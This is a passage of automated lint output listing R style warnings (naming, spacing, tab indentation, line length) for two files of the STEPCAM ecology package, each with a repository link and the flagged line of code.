^\n```\n[R/ABC_SMC.R:223:11:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] =\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:223:23:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] =\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:223:39:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L223) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] =\n                                      ^\n```\n[R/ABC_SMC.R:224:13:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:53:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n                                                    ^~~~~~~~\n```\n[R/ABC_SMC.R:224:63:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n                                                              ^~~~~~~~\n```\n[R/ABC_SMC.R:225:29:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​                            compVals, weights)\n                            ^~~~~~~~\n```\n[R/ABC_SMC.R:228:13:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L228) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:228:14:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L228) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:228:34:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L228) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:234:21:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L234) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:234:22:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L234) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:236:13:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L236) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:236:38:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L236) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:247:5:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:247:17:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:248:5:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L248) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:248:17:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L248) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:249:5:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L249) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:249:17:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L249) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:250:16:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L250) *style:* **Variable and function names should be all lowercase.**\n```r\n​    weights <- nextWeights\n               ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:252:21:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                    ^~~~~~~~\n```\n[R/ABC_SMC.R:252:31:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                              ^~~~~~~~\n```\n[R/ABC_SMC.R:252:41:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                                        ^~~~~~~~\n```\n[R/ABC_SMC.R:252:51:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                                                  ^~~~~~~\n```\n[R/ABC_SMC.R:253:21:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L253) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                    ^~~~~~\n```\n[R/ABC_SMC.R:253:29:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L253) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                            ^~~~~~\n```\n[R/ABC_SMC.R:253:37:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L253) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                                    ^~~~~~\n```\n[R/ABC_SMC.R:254:54:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L254) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:257:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L257) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:257:19:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                  ^~~~~~~~\n```\n[R/ABC_SMC.R:257:35:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:257:51:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:258:9:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L258) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:258:32:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L258) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:258:37:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L258) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n                                    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:261:5:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L261) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextWeights <- rep(1,numParticles)\n    ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:261:26:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L261) *style:* **Commas should always have a space after.**\n```r\n​    nextWeights <- rep(1,numParticles)\n                         ^\n```\n[R/ABC_SMC.R:261:26:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L261) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextWeights <- rep(1,numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:262:5:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextDisp <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:262:19:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextDisp <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:263:5:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextFilt <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:263:19:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextFilt <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:264:5:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L264) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextComp <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:264:19:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L264) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextComp <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:271:61:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L271) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 2, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:275:63:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L275) *style:* **Put spaces around all infix operators.**\n```r\n​      d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                             ~^~\n```\n[R/ABC_SMC.R:278:15:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L278) *style:* **Put spaces around all infix operators.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n             ~^~~\n```\n[R/ABC_SMC.R:279:44:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L279) *style:* **Put spaces around all infix operators.**\n```r\n​\t                          collapse = NULL), header = F)\n                                          ~^\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L32) *style:* 